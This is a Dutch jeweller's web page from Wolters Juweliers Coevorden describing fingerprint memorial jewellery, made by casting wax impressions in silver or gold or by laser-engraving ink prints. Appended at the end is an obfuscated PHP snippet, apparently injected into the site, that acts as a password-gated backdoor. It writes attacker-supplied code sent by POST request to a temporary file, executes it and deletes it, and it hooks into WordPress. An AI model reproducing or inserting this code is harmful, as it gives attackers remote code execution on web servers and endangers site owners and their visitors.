Vingerafdruk-sieraden-gedenksieraden-herinnering-dierbare-bij-Wolters-Juweliers-Coevorden

Sieraden met vingerafdruk

Er zijn veel mogelijkheden om te zorgen dat uw dierbare altijd bij u is. Zo zijn wij in staat om as, haar of een haarlok in een sieraad te verwerken. Tevens is het mogelijk een vingerafdruk ('fingerprints') of foto van uw dierbare in het sieraad te verwerken. Wij verwerken het in uw ring, hanger, armband, collier, munt, bedel, horloge u noemt het maar op. In goud en zilver. Vraag naar de mogelijkheden bij Wolters Juweliers Coevorden, wij leggen het graag voor uit.

Hoe gaat het maken van een vingerafdruk sieraad in zijn werk?

Vingerafdrukken die gemaakt zijn met was kunnen gegoten worden in zilver of goud. Hierbij blijft het duwen van de vinger in de was ook echt zichtbaar.
Dat geeft een wat grillig – maar heel ‘echt’ effect. Vingerafdrukken van inkt op papier of scan’s worden gelaserd op het sieraad.
De vingerafdrukken kunnen mooi diep in het sieraad gelaserd worden waardoor de lijntjes goed voelbaar zijn.

Wasbolletjes

Deze worden gegoten volgens de “verloren was methode”. Dit houdt in dat de afdruk “verloren” gaat tijdens het gieten. Als er meerdere sieraden gemaakt dienen te worden moet eerst een matrijs of mal gemaakt worden. Van deze matrijs kan vervolgens iedere gewenste hoeveelheid afdrukken gegoten worden in zilver, goud of witgoud.

Meest gevraagde vorm is de originele ronde vorm, waarbij wij de afdruk alleen afwerken en voorzien van een hangoog. Andere mogelijke vormen zijn bv. hart, klavertje 4, vlinder enz. Bij het gebruik van was is het ook mogelijk een dubbelzijdige afdruk te maken. U legt het wasbolletje op uw vinger en vervolgens drukt u de vinger van de vinger van uw dierbare er op. Hierdoor wordt de verbondenheid van deze twee personen voor eeuwig vastgelegd.

Wij adviseren te allen tijde 2 afdrukken te maken. Eentje kan naar ons verstuurd worden voor het vervaardigen/afwerken en de andere houdt u achter de hand uit voorzorg. Ook is het mogelijk de vingerafdruk te “laseren”. Hierbij wordt de vingerafdruk handmatig geretoucheerd en overgebracht door middel van een laser op het voorwerp. Indien u bijvoorbeeld een vingerafdruk op een ring wenst verdient het aanbeveling dit door middel van een laser aan te brengen, het is niet mogelijk om een was afdruk in een ring te verwerken. De vingerafdruk op het wasbolletje kan wel overgenomen worden en gelaserd worden op het gewenste sieraad.

Inktafdrukken

Inktafdrukken worden via een laser op het materiaal overgebracht. Dit materiaal kan edelmetaal, staal, glas enz. zijn. In principe is ieder vlak op een metaal geschikt om een afdruk te laseren en kan vele malen gebruikt worden. Bij de kosten van het laseren dient u rekening te houden met de bijkomende kosten van het artikel (b.v. zilveren of gouden plaatje) waarop de vingerafdruk moet komen.

Meer weten over onze gedenksieraden? Lees ook onze andere informatiepagina over gedenk en as sieraden. Heeft u nog vragen over het maken van vingerafdruk sieraden? Neem contact met ons op, wij helpen u graag!  Wolters Juweliers is ook dealer van See You gedenksieraden.

vingerafdruk-sieraden-ringen-hangers-wij-ontwerpen-gedenksieraden-voor-u-Wolters-Juweliers-Coevorden

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}